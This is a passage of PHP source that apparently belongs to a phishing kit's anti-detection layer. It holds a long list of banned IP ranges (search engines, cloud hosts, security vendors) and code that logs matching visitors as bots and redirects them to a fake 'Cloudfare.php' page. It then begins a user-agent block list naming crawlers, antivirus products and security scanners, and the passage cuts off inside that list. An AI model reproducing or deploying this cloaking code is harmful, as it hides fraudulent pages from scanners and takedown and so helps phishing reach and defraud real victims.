    "219.117.238.170",
    "222.154.252.*",
    "23.21.227.69",
    "23.27.153.247",
    "23.27.154.37",
    "24.23.24.144",
    "2600:1900:2000:38:400::10",
    "27.0.1453.110",
    "27.54.62.91",
    "3.0.04506.648",
    "3.0.4506.2152",
    "3.101.0.4",
    "31.13.191.161",
    "31.168.158.239",
    "34.229.141.32",
    "34.237.113.113",
    "34.66.238.194",
    "34.71.81.227",
    "35.166.160.161",
    "35.202.98.254",
    "35.223.233.20",
    "35.224.124.244",
    "35.243.23.74",
    "35.243.23.83",
    "37.120.213.169",
    "37.187.96.202",
    "39.0.2150.5",
    "4.14.0.0",
    "4.14.64.*",
    "40.94.89.*",
    "41.0.2272.118",
    "43.0.2357.81",
    "44.0.2403.155",
    "46.101.119.24",
    "46.101.94.163",
    "46.248.190.0",
    "46.248.190.1",
    "46.248.190.10",
    "46.248.190.100",
    "46.248.190.101",
    "46.248.190.102",
    "46.248.190.103",
    "46.248.190.104",
    "46.248.190.105",
    "46.248.190.106",
    "46.248.190.107",
    "46.248.190.108",
    "46.248.190.109",
    "46.248.190.11",
    "46.248.190.110",
    "46.248.190.111",
    "46.248.190.112",
    "46.248.190.113",
    "46.248.190.114",
    "46.248.190.115",
    "46.248.190.116",
    "46.248.190.117",
    "46.248.190.118",
    "46.248.190.119",
    "46.248.190.12",
    "46.248.190.120",
    "46.248.190.121",
    "46.248.190.122",
    "46.248.190.123",
    "46.248.190.124",
    "46.248.190.125",
    "46.248.190.126",
    "46.248.190.127",
    "46.248.190.128",
    "46.248.190.129",
    "46.248.190.13",
    "46.248.190.130",
    "46.248.190.131",
    "46.248.190.132",
    "46.248.190.133",
    "46.248.190.134",
    "46.248.190.135",
    "46.248.190.136",
    "46.248.190.137",
    "46.248.190.138",
    "46.248.190.139",
    "46.248.190.14",
    "46.248.190.140",
    "46.248.190.141",
    "46.248.190.142",
    "46.248.190.143",
    "46.248.190.144",
    "46.248.190.145",
    "46.248.190.146",
    "46.248.190.147",
    "46.248.190.148",
    "46.248.190.149",
    "46.248.190.15",
    "46.248.190.150",
    "46.248.190.151",
    "46.248.190.152",
    "46.248.190.153",
    "46.248.190.154",
    "46.248.190.155",
    "46.248.190.156",
    "46.248.190.157",
    "46.248.190.158",
    "46.248.190.159",
    "46.248.190.16",
    "46.248.190.160",
    "46.248.190.161",
    "46.248.190.162",
    "46.248.190.163",
    "46.248.190.164",
    "46.248.190.165",
    "46.248.190.166",
    "46.248.190.167",
    "46.248.190.168",
    "46.248.190.169",
    "46.248.190.17",
    "46.248.190.170",
    "46.248.190.171",
    "46.248.190.172",
    "46.248.190.173",
    "46.248.190.174",
    "46.248.190.175",
    "46.248.190.176",
    "46.248.190.177",
    "46.248.190.178",
    "46.248.190.179",
    "46.248.190.18",
    "46.248.190.180",
    "46.248.190.181",
    "46.248.190.182",
    "46.248.190.183",
    "46.248.190.184",
    "46.248.190.185",
    "46.248.190.186",
    "46.248.190.187",
    "46.248.190.188",
    "46.248.190.189",
    "46.248.190.19",
    "46.248.190.190",
    "46.248.190.191",
    "46.248.190.192",
    "46.248.190.193",
    "46.248.190.194",
    "46.248.190.195",
    "46.248.190.196",
    "46.248.190.197",
    "46.248.190.198",
    "46.248.190.199",
    "46.248.190.2",
    "46.248.190.20",
    "46.248.190.200",
    "46.248.190.201",
    "46.248.190.202",
    "46.248.190.203",
    "46.248.190.204",
    "46.248.190.205",
    "46.248.190.206",
    "46.248.190.207",
    "46.248.190.208",
    "46.248.190.209",
    "46.248.190.21",
    "46.248.190.210",
    "46.248.190.211",
    "46.248.190.212",
    "46.248.190.213",
    "46.248.190.214",
    "46.248.190.215",
    "46.248.190.216",
    "46.248.190.217",
    "46.248.190.218",
    "46.248.190.219",
    "46.248.190.22",
    "46.248.190.220",
    "46.248.190.221",
    "46.248.190.222",
    "46.248.190.223",
    "46.248.190.224",
    "46.248.190.225",
    "46.248.190.226",
    "46.248.190.227",
    "46.248.190.228",
    "46.248.190.229",
    "46.248.190.23",
    "46.248.190.230",
    "46.248.190.231",
    "46.248.190.232",
    "46.248.190.233",
    "46.248.190.234",
    "46.248.190.235",
    "46.248.190.236",
    "46.248.190.237",
    "46.248.190.238",
    "46.248.190.239",
    "46.248.190.24",
    "46.248.190.240",
    "46.248.190.241",
    "46.248.190.242",
    "46.248.190.243",
    "46.248.190.244",
    "46.248.190.245",
    "46.248.190.246",
    "46.248.190.247",
    "46.248.190.248",
    "46.248.190.249",
    "46.248.190.25",
    "46.248.190.250",
    "46.248.190.26",
    "46.248.190.27",
    "46.248.190.28",
    "46.248.190.29",
    "46.248.190.3",
    "46.248.190.30",
    "46.248.190.31",
    "46.248.190.32",
    "46.248.190.33",
    "46.248.190.34",
    "46.248.190.35",
    "46.248.190.36",
    "46.248.190.37",
    "46.248.190.38",
    "46.248.190.39",
    "46.248.190.4",
    "46.248.190.40",
    "46.248.190.41",
    "46.248.190.42",
    "46.248.190.43",
    "46.248.190.44",
    "46.248.190.45",
    "46.248.190.46",
    "46.248.190.47",
    "46.248.190.48",
    "46.248.190.49",
    "46.248.190.5",
    "46.248.190.50",
    "46.248.190.51",
    "46.248.190.52",
    "46.248.190.53",
    "46.248.190.54",
    "46.248.190.55",
    "46.248.190.56",
    "46.248.190.57",
    "46.248.190.58",
    "46.248.190.59",
    "46.248.190.6",
    "46.248.190.60",
    "46.248.190.61",
    "46.248.190.62",
    "46.248.190.63",
    "46.248.190.64",
    "46.248.190.65",
    "46.248.190.66",
    "46.248.190.67",
    "46.248.190.68",
    "46.248.190.69",
    "46.248.190.7",
    "46.248.190.70",
    "46.248.190.71",
    "46.248.190.72",
    "46.248.190.73",
    "46.248.190.74",
    "46.248.190.75",
    "46.248.190.76",
    "46.248.190.77",
    "46.248.190.78",
    "46.248.190.79",
    "46.248.190.8",
    "46.248.190.80",
    "46.248.190.81",
    "46.248.190.82",
    "46.248.190.83",
    "46.248.190.84",
    "46.248.190.85",
    "46.248.190.86",
    "46.248.190.87",
    "46.248.190.88",
    "46.248.190.89",
    "46.248.190.9",
    "46.248.190.90",
    "46.248.190.91",
    "46.248.190.92",
    "46.248.190.93",
    "46.248.190.94",
    "46.248.190.95",
    "46.248.190.96",
    "46.248.190.97",
    "46.248.190.98",
    "46.248.190.99",
    "47.30.133.89",
    "5.189.142.136",
    "5.62.39.18",
    "5.62.41.35",
    "5.62.56.91",
    "50.112.194.65",
    "50.116.2.167",
    "50.16.241.113",
    "50.16.241.114",
    "50.16.241.117",
    "50.16.247.234",
    "51.0.2704.103",
    "51.15.136.98",
    "52.18.11.161",
    "52.192.164.225",
    "52.204.27.85",
    "52.204.97.54",
    "52.27.2.86",
    "52.31.63.97",
    "52.5.190.19",
    "52.5.98.73",
    "52.72.33.140",
    "52.87.10.90",
    "52.91.94.56",
    "53.0.2785.116",
    "54.197.234.188",
    "54.198.55.229",
    "54.207.33.42",
    "54.208.100.253",
    "54.213.103.141",
    "54.228.218.117",
    "54.245.191.79",
    "56.0.2924.87",
    "57.0.2987.98",
    "61.0.3116.0",
    "62.210.13.58",
    "62.24.252.133",
    "62.67.194.35",
    "63.0.3239.132",
    "63.123.238.8",
    "64.0.3282.140",
    "64.0.3282.167",
    "64.110.130.5",
    "65.214.45.143",
    "65.214.45.148",
    "66.0.3358.0",
    "66.0.3359.0",
    "66.235.124.101",
    "66.235.124.192",
    "66.235.124.193",
    "66.235.124.196",
    "66.235.124.7",
    "66.235.124.73",
    "66.235.124.74",
    "66.249.66.1",
    "66.249.91.*",
    "66.249.91.203",
    "67.0.3360.0",
    "67.0.3361.0",
    "68.183.245.118",
    "68.65.53.71",
    "69.164.111.198",
    "69.171.251.118",
    "69.25.58.61",
    "74.211.8.61",
    "74.50.56.239",
    "75.163.12.85",
    "76.19.184.88",
    "77.69.251.230",
    "8.28.16.254",
    "80.104.176.17",
    "80.44.175.165",
    "80.67.172.162",
    "81.0.48.*",
    "81.0.48.138",
    "82.102.18.114",
    "82.102.19.136",
    "82.102.27.124",
    "82.102.27.75",
    "82.102.27.77",
    "82.223.27.82",
    "83.31.41.195",
    "83.31.41.200",
    "83.97.23.38",
    "84.13.191.239",
    "84.17.43.76",
    "84.92.148.184",
    "87.113.78.97",
    "87.113.96.90",
    "87.115.213.2",
    "87.115.231.241",
    "88.99.62.141",
    "89.197.44.226",
    "89.234.157.254",
    "89.238.131.150",
    "89.238.139.12",
    "91.103.66.200",
    "91.231.212.111",
    "92.103.69.158",
    "93.107.26.45",
    "97.85.126.186^66.102.*.*",
    "^1.128.96.181",
    "^1.132.97.75",
    "^1.152.96.223",
    "^1.152.97.32",
    "^1.234.41.*",
    "^1.33.126.*",
    "^100.43.*.*",
    "^100.6.107.*",
    "^101.174.147.73",
    "^103.19.16.*",
    "^103.35.*.*",
    "^103.6.76.*",
    "^103.86.99.*",
    "^104.108.64.175",
    "^104.131.165.123",
    "^104.131.223.*",
    "^104.132.*.*",
    "^104.132.20.*",
    "^104.146.*.*",
    "^104.15.60.*",
    "^104.16.*.*",
    "^104.193.88.*",
    "^104.236.153.*",
    "^104.42.*.*",
    "^105.107.79.*",
    "^106.12.*.*",
    "^106.133.165.*",
    "^107.170.*.*",
    "^107.178.*.*",
    "^107.178.194.*",
    "^107.178.195.*",
    "^107.20.181.*",
    "^108.162.215.*",
    "^108.162.246.*",
    "^108.210.106.*",
    "^109.186.*.*",
    "^110.88.*.*",
    "^111.231.*.*",
    "^111.89.*.*",
    "^115.231.36.*",
    "^119.63.*.*",
    "^12.148.196.*",
    "^12.148.209.*",
    "^124.66.185.*",
    "^128.242.*.*",
    "^128.28.*.*",
    "^128.72.*.*",
    "^128.75.*.*",
    "^13.57.36.*",
    "^131.*.*.*",
    "^131.120.12.*",
    "^131.212.*.*",
    "^131.253.*.*",
    "^133.11.204.*",
    "^134.119.*.*",
    "^134.170.2.199",
    "^138.122.*.*",
    "^139.59.*.*",
    "^14.101.178.*",
    "^141.101.104.*",
    "^141.185.209.*",
    "^144.217.82.*",
    "^147.75.210.*",
    "^148.163.128.*",
    "^149.20.*.*",
    "^149.20.54.*",
    "^157.*.*.*",
    "^157.201.10.*",
    "^157.39.109.*",
    "^157.54.*.*",
    "^157.55.39.*",
    "^158.108.*.*",
    "^158.69.216.*",
    "^162.158.*.*",
    "^162.158.7.*",
    "^162.158.72.*",
    "^162.158.95.*",
    "^162.244.*.*",
    "^163.195.178.*",
    "^167.24.*.*",
    "^168.188.*.*",
    "^169.207.238.*",
    "^17.198.249.*",
    "^172.217.*.*",
    "^173.11.97.*",
    "^173.14.18.*",
    "^173.192.*.*",
    "^173.194.*.*",
    "^173.194.112.*",
    "^173.194.116.102",
    "^173.194.116.149",
    "^173.205.33.*",
    "^173.224.160.*",
    "^173.224.161.*",
    "^173.224.162.*",
    "^173.224.163.*",
    "^173.224.164.*",
    "^173.224.165.*",
    "^173.224.166.*",
    "^173.224.167.*",
    "^173.239.*.*",
    "^173.244.36.*",
    "^173.245.55.*",
    "^173.252.*.*",
    "^173.252.86.*",
    "^174.255.*.*",
    "^175.135.172.*",
    "^176.195.231.*",
    "^178.43.117.*",
    "^178.62.113.173",
    "^180.29.89.*",
    "^181.229.*.*",
    "^182.75.120.*",
    "^182.75.120.10",
    "^184.165.*.*",
    "^184.173.*.*",
    "^185.145.156.*",
    "^185.2.138.*",
    "^185.20.4.*",
    "^185.20.5.*",
    "^185.220.101.*",
    "^185.28.20.*",
    "^185.28.20.243",
    "^185.41.162.*",
    "^185.75.*.*",
    "^185.75.141.32",
    "^186.6.*.*",
    "^188.165.83.*",
    "^188.166.*.*",
    "^188.207.200.*",
    "^188.244.39.*",
    "^190.82.81.*",
    "^191.98.136.*",
    "^192.115.134.*",
    "^192.118.48.*",
    "^192.232.213.*",
    "^193.128.*.*",
    "^193.220.178.*",
    "^193.221.113.53",
    "^193.226.*.*",
    "^193.253.199.*",
    "^193.47.80.*",
    "^194.153.113.*",
    "^194.52.68.*",
    "^194.72.238.*",
    "^194.90.*.*",
    "^195.128.227.*",
    "^195.211.*.*",
    "^195.211.23.*",
    "^196.23.168.*",
    "^198.186.190.*",
    "^198.186.191.*",
    "^198.186.192.*",
    "^198.186.193.*",
    "^198.25.*.*",
    "^198.41.243.*",
    "^198.54.*.*",
    "^198.60.236.*",
    "^198.68.61.*",
    "^199.3.10.*",
    "^199.30.228.*",
    "^199.59.150.*",
    "^202.*.*.*",
    "^202.108.252.*",
    "^202.160.*.*",
    "^203.188.221.*",
    "^203.215.181.*",
    "^204.*.*.*",
    "^204.101.161.159",
    "^204.119.24.*",
    "^204.14.48.*",
    "^204.251.90.*",
    "^204.85.191.*",
    "^205.201.132.*",
    "^206.207.*.*",
    "^206.207.80.*",
    "^206.253.226.*",
    "^206.28.72.*",
    "^206.80.*.*",
    "^207.*.*.*",
    "^207.126.144.*",
    "^207.46.*.*",
    "^207.46.8.167",
    "^207.46.8.199",
    "^207.68.*.*",
    "^207.70.*.*",
    "^207.70.60.*",
    "^207.80.*.*",
    "^208.101.*.*",
    "^208.43.225.*",
    "^208.65.144.*",
    "^208.76.45.53",
    "^208.84.*.*",
    "^208.87.233.*",
    "^208.91.115.*",
    "^209.*",
    "^209.135.212.*",
    "^209.185.108.*",
    "^209.185.253.*",
    "^209.19.*.*",
    "^209.19.185.*",
    "^209.19.186.231",
    "^209.191.*.*",
    "^209.66.70.*",
    "^209.73.228.*",
    "^209.85.*.*",
    "^209.85.128.*",
    "^210.55.200.*",
    "^212.113.37.*",
    "^212.143.*.*",
    "^212.150.*.*",
    "^212.235.*.*",
    "^212.29.192.*",
    "^212.29.224.*",
    "^212.50.193.*",
    "^212.8.79.*",
    "^213.*.*.*",
    "^213.100.*.*",
    "^216.10.193.*",
    "^216.162.209.*",
    "^216.239.*.*",
    "^216.239.32.*",
    "^216.252.*.*",
    "^216.252.167.*",
    "^216.33.229.163",
    "^216.58.*.*",
    "^216.58.211.37",
    "^217.132.*.*",
    "^217.16.26.*",
    "^217.16.26.166",
    "^217.74.103.*",
    "^217.96.*.*",
    "^219.*.*.*",
    "^219.117.238.170",
    "^222.154.252.*",
    "^23.27.152.*",
    "^24.172.*.*",
    "^35.153.86.*",
    "^35.172.115.*",
    "^36.74.236.*",
    "^36.83.56.*",
    "^37.128.131.171",
    "^37.140.188.*",
    "^38.100.*.*",
    "^38.105.*.*",
    "^38.144.36.*",
    "^38.74.138.*",
    "^4.14.0.0",
    "^4.14.64.*",
    "^4.14.64.*.*",
    "^40.107.*.*",
    "^40.121.198.*",
    "^40.85.158.*",
    "^41.208.72.*",
    "^42.112.8.*",
    "^46.101.119.*",
    "^46.101.249.238",
    "^46.101.43.*",
    "^46.116.*.* ",
    "^46.116.*.*",
    "^46.244.*.*",
    "^46.4.120.*",
    "^49.104.10.*",
    "^5.189.*.*",
    "^50.107.*.*",
    "^50.7.*.*",
    "^50.97.*.*",
    "^51.15.*.*",
    "^52.31.147.*",
    "^52.90.*.*",
    "^54.164.*.*",
    "^54.176.*.*",
    "^54.228.218.*",
    "^54.228.218.117",
    "^61.21.221.*",
    "^62.116.207.*",
    "^62.141.65.*",
    "^62.149.225.67",
    "^62.90.*.*",
    "^62.99.77.*",
    "^63.*.*.*",
    "^64.*.*.*",
    "^64.106.213.*",
    "^64.124.14.*",
    "^64.18.*.*",
    "^64.233.*.*",
    "^64.233.160.*",
    "^64.233.173.*",
    "^64.233.191.*",
    "^64.233.191.255*",
    "^64.235.*.*",
    "^64.235.153.*",
    "^64.235.154.*",
    "^64.27.2.*",
    "^64.37.103.*",
    "^64.4.*.*",
    "^64.62.136.*",
    "^64.62.175.*",
    "^64.68.*.*",
    "^64.68.90.*",
    "^64.68.90.*^81.161.59.*",
    "^64.71.*.*",
    "^64.71.193.*",
    "^64.71.204.*",
    "^64.71.205.*",
    "^64.71.206.*",
    "^64.74.*.*",
    "^64.74.215.*",
    "^65.*.*.*",
    "^65.208.151.*",
    "^65.52.*.*",
    "^65.54.188.110",
    "^65.54.188.126",
    "^65.54.188.94",
    "^65.55.206.154",
    "^65.55.33.119",
    "^65.55.33.135",
    "^65.55.37.104",
    "^65.55.37.120",
    "^65.55.37.72",
    "^65.55.37.88",
    "^65.55.85.12",
    "^65.55.92.136",
    "^65.55.92.152",
    "^65.55.92.168",
    "^65.55.92.184",
    "^66.102.*.*",
    "^66.102.6.*",
    "^66.102.8.*",
    "^66.135.200.*",
    "^66.150.14.*",
    "^66.196.*.*",
    "^66.205.64.*",
    "^66.207.120.*",
    "^66.211.160.86*",
    "^66.211.169.3",
    "^66.211.169.66",
    "^66.214.*.*",
    "^66.221.*.*",
    "^66.228.*.*",
    "^66.249.*.*",
    "^67.15.*.*",
    "^67.195.*.*",
    "^67.209.128.*",
    "^68.*.*.*",
    "^68.14.83.*",
    "^68.142.*.*",
    "^68.65.53.71",
    "^69.164.*.*",
    "^69.164.111.*",
    "^69.164.145.*",
    "^69.61.12.*",
    "^69.65.*.*",
    "^72.13.86.*",
    "^72.14.*.*",
    "^72.14.192.*",
    "^72.14.199.*",
    "^72.30.*.*",
    "^72.49.133.*",
    "^72.52.96.*",
    "^72.94.249.*",
    "^74.125.*.*",
    "^74.125.133.*",
    "^74.6.*.*",
    "^78.148.13.*",
    "^79.79.147.162",
    "^79.79.148.223",
    "^8.12.*.*",
    "^8.23.224.*",
    "^8.6.48.*",
    "^81.161.59.*",
    "^82.166.*.*",
    "^83.31.*.*",
    "^83.31.118.*",
    "^83.31.69.*",
    "^83.71.*.*",
    "^84.51.153.*",
    "^84.93.84.*",
    "^85.250.*.*",
    "^85.64.*.*",
    "^85.9.7.*",
    "^86.132.235.*",
    "^87.106.251.*",
    "^87.115.213.*",
    "^89.108.102.*",
    "^89.138.*.*",
    "^89.163.159.214",
    "^89.234.*.*",
    "^91.103.66.*",
    "^91.231.*.*",
    "^91.231.212.*",
    "^92.103.69.*",
    "^92.189.25.*",
    "^92.23.56.*",
    "^93.119.*.*",
    "^93.172.*.*",
    "^93.54.82.*",
    "^94.26.*.*",
    "^95.108.194.*",
    "^95.45.252.*",
    "^95.76.156.*",
    "^95.85.*.*",
    "^98.136.*.*"
);
if (in_array(getIp(), $bannedIP)) {
    logger(getIp(), "BOT IP");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
} else {
    foreach ($bannedIP as $ipsss) {
        if (preg_match("/" . $ipsss . "/", getIp())) {
            logger($ipsss, "BOT IP");
            die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
        }
    }
}

$blocked_words2 = array(
    "(bot",
    "-bot",
    "....",
    ".bot",
    "/bot",
    "/teoma",
    "007ac9",
    "008",
    "008\/",
    "13TABS",
    "192.comagent",
    "192\.comAgent",
    "200pleasebot",
    "2ip\.ru",
    "360spider",
    "404enemy",
    "4seohuntbot",
    "50.nu",
    "7Siters",
    "80legs",
    "80legs.com/webcrawler",
    ":bot",
    "a3logics\.in",
    "a6-indexer",
    "A6-Indexer",
    "abacho",
    "Abonti",
    "abot",
    "Aboundex",
    "aboundexbot",
    "aboutthedomain",
    "aboutusbot",
    "above",
    "abrave spider",
    "accelobot",
    "accoona",
    "Accoona-AI-Agent",
    "acoi",
    "acoon",
    "acoonbot",
    "acrylicapps\.com\/pulp",
    "Acunetix",
    "acunetix",
    "AdAuth\/",
    "adaxas",
    "adbeat",
    "AddThis",
    "addthis.com",
    "admantx",
    "ADmantX",
    "AdminLabs",
    "adressendeutschland",
    "adsbot",
    "adsbot-google",
    "adscanner",
    "adstxt-worker",
    "Adstxtaggregator",
    "adstxt\.com",
    "agada",
    "agentslug",
    "agusescan",
    "ah-ha.com",
    "AHC",
    "ahoy",
    "AhrefsBot",
    "ahrefsbot",
    "aihit",
    "aiohttp\/",
    "Airmail",
    "akka-http\/",
    "akula\/",
    "aladin",
    "alertra",
    "alexa site audit",
    "alexabot",
    "Alibaba\.Security\.Heimdall",
    "alkaline",
    "Alligator",
    "allloadin",
    "AllSubmitter",
    "altavista",
    "alyze\.info",
    "amagit",
    "amagit.com",
    "amibot",
    "amznkassocbot",
    "amzn_assoc",
    "analytics",
    "ananzi",
    "Anarchie",
    "AndroidDownloadManager",
    "Anemone",
    "AngleSharp",
    "annotate",
    "annotate_google",
    "anonymizer",
    "antbot",
    "anthill",
    "antivirus",
    "Antivirus",
    "Anturis Agent",
    "Ant\.com",
    "AnyEvent-HTTP\/",
    "anzwers",
    "anzwerscrawl",
    "Apache Droid",
    "Apache OpenOffice",
    "Apache-HttpAsyncClient",
    "Apache-HttpClient",
    "apache-httpclient",
    "ApacheBench",
    "apercite",
    "Apexoo",
    "APIs-Google",
    "aplix",
    "aportworm",
    "AportWorm\/",
    "AppBeat\/",
    "AppEngine-Google",
    "appie",
    "applebot",
    "AppleSyndication",
    "AppStoreScraperZ",
    "Aprc\/[0-9]",
    "arabot",
    "Arachmo",
    "arachnode",
    "Arachnophilia",
    "arachnophilia",
    "arale",
    "araneo",
    "aranha",
    "architext",
    "aretha",
    "aria2",
    "arks",
    "Arukereso",
    "asafaweb",
    "Ask Jeeves",
    "ask24",
    "askaboutoil",
    "asked",
    "AskQuickly",
    "aspseek",
    "ASPSeek",
    "Asterias",
    "asterias",
    "Astute",
    "asynchttp",
    "atlocal",
    "atn",
    "atomz",
    "Attach",
    "augurfind",
    "autocite",
    "AutomaticWPTester",
    "Autonomy",
    "avant",
    "avast",
    "avg",
    "avira",
    "AWS Security Scanner",
    "axios\/",
    "a\.pr-cy\.ru",
    "B-l-i-t-z-B-O-T",
    "baboom",
    "Backlink-Ceck",
    "backlink-check",
    "BacklinkHttpStatus",
    "backrub",
    "BackStreet",
    "BackWeb",
    "Bad-Neighborhood",
    "Badass",
    "baidu",
    "baiduspider",
    "Baiduspider",
    "baidu\.com",
    "Bandit",
    "bannana_bot",
    "basicstate",
    "BatchFTP",
    "Battleztar Bazinga",
    "baypup",
    "baypup\/",
    "BazQux",
    "BazQuxBot",
    "BBBike",
    "BCKLINKS",
    "BDFetch",
    "bdfetch",
    "BegunAdvertising",
    "Bidtellect",
    "big brother",
    "BigBozz",
    "bigbrother",
    "Bigfoot",
    "biglotron",
    "bilbo",
    "bingbot",
    "BingLocalSearch",
    "BingPreview",
    "bingpreview",
    "binlar",
    "biNu image cacher",
    "Bitacle",
    "bitdefender",
    "biz_Directory",
    "bjaaland",
    "Black Hole",
    "Blackboard Safeassign",
    "blackwidow",
    "BlackWidow",
    "blaiz",
    "blo.",
    "BlockNote\.Net",
    "blog",
    "Bloglines",
    "Bloglovin",
    "BlogPulseLive",
    "BlogSearch",
    "Blogtrottr",
    "bloodhound",
    "BlowFish",
    "boitho",
    "boitho\.com-dc",
    "BomboraBot",
    "booch",
    "bot",
    "bot.",
    "bot/",
    "BPImageWalker",
    "bradley",
    "Braintree-Webhooks",
    "Branch Metrics API",
    "Branch-Passthrough",
    "Brandprotect",
    "BrandVerity",
    "Brandwatch",
    "Brodie\/",
    "Browsershots",
    "BUbiNG",
    "Buck\/",
    "Buddy",
    "BuiltWith",
    "Bullseye",
    "BunnySlippers",
    "Burf Search",
    "butterfly",
    "Butterfly",
    "Butterfly\/",
    "BuzzSumo",
    "CAAM\/[0-9]",
    "cache.google.com",
    "CakePHP",
    "Calculon",
    "calif",
    "calyxinstitute",
    "camehttps",
    "Canary%20Mail",
    "CaretNail",
    "cassandra",
    "catexplorador",
    "CC Metadata Scaper",
    "CCBot",
    "ccubee",
    "Cegbfeieh",
    "censys",
    "Cerberian Drtrs",
    "CERT\.at-Statistics-Survey",
    "cfetch",
    "cg-eye",
    "changeAGENT",
    "ChangesMeter",
    "Charlotte",
    "charlotte",
    "CheckHost",
    "checkprivacy",
    "CherryPicker",
    "ChinaClaw",
    "Chirp\/",
    "chkme\.com",
    "Chlooe",
    "Chromaxa",
    "churl",
    "cienciaficcion",
    "CirrusExplorer",
    "CISPA Vulnerability Notification",
    "Citoid",
    "CJNetworkQuality",
    "CL0NA",
    "Clarsentia",
    "clips\.ua\.ac\.be",
    "Cliqzbot",
    "Cloud mapping",
    "CloudEndure",
    "CloudFlare-AlwaysOnline",
    "Cloudinary",
    "cmc",
    "cmcm\.com",
    "coccoc",
    "cognitiveseo",
    "collective",
    "colly -",
    "comagent",
    "combine",
    "CommaFeed",
    "Commons-HttpClient",
    "commonscan",
    "compatible",
    "computingsite",
    "contactbigdatafr",
    "contentkingapp",
    "convera",
    "CookieReports",
    "copyright sheriff",
    "CopyRightCheck",
    "Copyscape",
    "cortex\/",
    "Cosmos4j\.feedback",
    "Covario-IDS",
    "crawl",
    "crawlconvera",
    "crawler",
    "Craw\/",
    "Crescent",
    "Criteo",
    "Crowsnest",
    "csci",
    "CSHttp",
    "CSSCheck",
    "curb",
    "Curious George",
    "curl",
    "cusco",
    "cuwhois\/",
    "cybo\.com",
    "cyveillance",
    "dalvik",
    "DAP\/NetHTTP",
    "DareBoost",
    "DatabaseDriverMysqli",
    "DataCha0s",
    "Datafeedwatch",
    "Datanyze",
    "DataparkSearch",
    "dataprovider",
    "DataXu",
    "Daum(oa)?[ \/][0-9]",
    "daumoa",
    "dbot",
    "dBpoweramp",
    "ddline",
    "deepindex",
    "deeris",
    "del.icio.us",
    "delorie",
    "Demon",
    "depspid",
    "DeuSu",
    "developers\.google\.com\/\+\/web\/snippet\/",
    "Devil",
    "deweb",
    "die blinde kuh",
    "dieblindekuh",
    "Digg",
    "digger",
    "Digincore",
    "DigitalPebble",
    "Dirbuster",
    "Discourse Forum Onebox",
    "Dispatch\/",
    "Disqus\/",
    "ditto",
    "DittoSpyder",
    "dlvr",
    "DMBrowser",
    "dmoz",
    "DNSPod-reporting",
    "docoloc",
    "docomo",
    "DoCoMo/2.0 N905i",
    "Dolphin http client",
    "DomainAppender",
    "Donuts Content Explorer",
    "dotMailer content retrieval",
    "dotSemantic",
    "downforeveryoneorjustme",
    "download express",
    "Download Wonder",
    "downloadexpress",
    "downnotifier",
    "DowntimeDetector",
    "dr.web",
    "Dr.Web",
    "dreamhost",
    "dreampassport",
    "Drip",
    "drupact",
    "Drupal \(\+http:\/\/drupal\.org\/\)",
    "drweb",
    "dtaagent",
    "DTS Agent",
    "dubaiindex",
    "duckduckbot",
    "DuplexWeb-Google",
    "dwcp",
    "e-collector",
    "EARTHCOM",
    "Easy-Thumb",
    "EasyDL",
    "EBAY",
    "ebay",
    "ebiness",
    "ebingbong",
    "Ebingbong",
    "ebot",
    "ec2linkfinder",
    "eCairn-Grabber",
    "eCatch",
    "ECCP",
    "echo blinde kuh",
    "eContext\/",
    "Ecxi",
    "EirGrabber",
    "ejupiter",
    "ElectricMonk",
    "elefent",
    "emacs-w3 search engine",
    "emacs-w3searchengine",
    "EMail Exractor",
    "EMail Wolf",
    "EmailWolf",
    "Embarcadero",
    "Embed PHP Library",
    "Embedly",
    "endo\/",
    "esther",
    "europarchive\.org",
    "evc-batch",
    "EventMachine HttpClient",
    "Everwall Link Expander",
    "Evidon",
    "evliya celebi",
    "evliyacelebi",
    "Evrinid",
    "Exabot",
    "exabot",
    "ExactSearch",
    "ExaleadCloudview",
    "Excel\/",
    "exif",
    "Exploratodo",
    "Express WebPictures",
    "externalhit",
    "Extreme Picture Finder",
    "EyeNetIE",
    "ezooms",
    "Ezooms",
    "ezresult",
    "facebook",
    "facebookexternalhit",
    "facebookexternalua",
    "facebookplatform",
    "facebot",
    "fairshare",
    "falcon",
    "fangcrawl",
    "Faraday v",
    "fasthttp",
    "Faveeo",
    "Favicon downloader",
    "favicon",
    "faviconarchive",
    "faviconkit",
    "FavOrg",
    "Feed Wrangler",
    "Feedable\/",
    "Feedbin",
    "FeedBooster",
    "FeedBucket",
    "FeedBunch\/",
    "FeedBurner",
    "feeder",
    "feedfetcher",
    "Feedfetcher",
    "Feedfetcher-Google",
    "Feedly",
    "FeedshowOnline",
    "Feedspot",
    "Feedwind\/",
    "FeedZcollector",
    "feeltiptop",
    "felix ide",
    "felixide",
    "ferret",
    "Fetch API",
    "fetchrover",
    "Fetch\/[0-9]",
    "Fever\/[0-9]",
    "FHscan",
    "fido",
    "Fimap",
    "findlink",
    "findlinks",
    "findthatfile",
    "fireball",
    "firebird",
    "fish search",
    "fishsearch",
    "FlashGet",
    "FlipboardBrowserProxy",
    "FlipboardProxy",
    "FlipboardRSS",
    "Flock\/",
    "fluffy",
    "Flunky",
    "flynxapp",
    "FM Scene",
    "forensiq",
    "forticlient",
    "forticlient.com",
    "fortiguard",
    "fortiguard.com",
    "Fortinet",
    "fouineur",
    "FoundSeoTool",
    "free thumbnails",
    "FreeBSD",
    "Freeuploader",
    "Funnelback",
    "funnelweb",
    "G-i-g-a-b-o-t",
    "g00g1e\.net",
    "ganarvisitas",
    "gazz",
    "gcreep",
    "geek-tools",
    "genieknows",
    "Genieo",
    "GentleSource",
    "GetCode",
    "Getintent",
    "GetLinkInfo",
    "getprismatic",
    "GetRight",
    "getroot",
    "getterroboplus",
    "geturl",
    "GetURLInfo\/",
    "GetWeb",
    "Geziyor",
    "Ghost Inspector",
    "GigablastOpenSource",
    "GIS-LABS",
    "github",
    "github-camo",
    "github\.com",
    "glx",
    "Go http package",
    "Go [\d\.]* package http",
    "Go!Zilla",
    "Go-Ahead-Got-It",
    "go-http-client",
    "Go-http-client",
    "go-http-client/1.1",
    "gobyus",
    "gofetch",
    "goforit",
    "golem",
    "GomezAgent",
    "gooblog",
    "Goodzer\/",
    "Google AppsViewer",
    "Google Desktop",
    "Google favicon",
    "Google Keyword Suggestion",
    "Google Keyword Tool",
    "Google Page Speed Insights",
    "Google PP Default",
    "Google Search Console",
    "Google Web Preview",
    "Google",
    "google",
    "Google-Adwords",
    "Google-Apps-Script",
    "Google-Calendar-Importer",
    "Google-HotelAdsVerifier",
    "Google-HTTP-Java-Client",
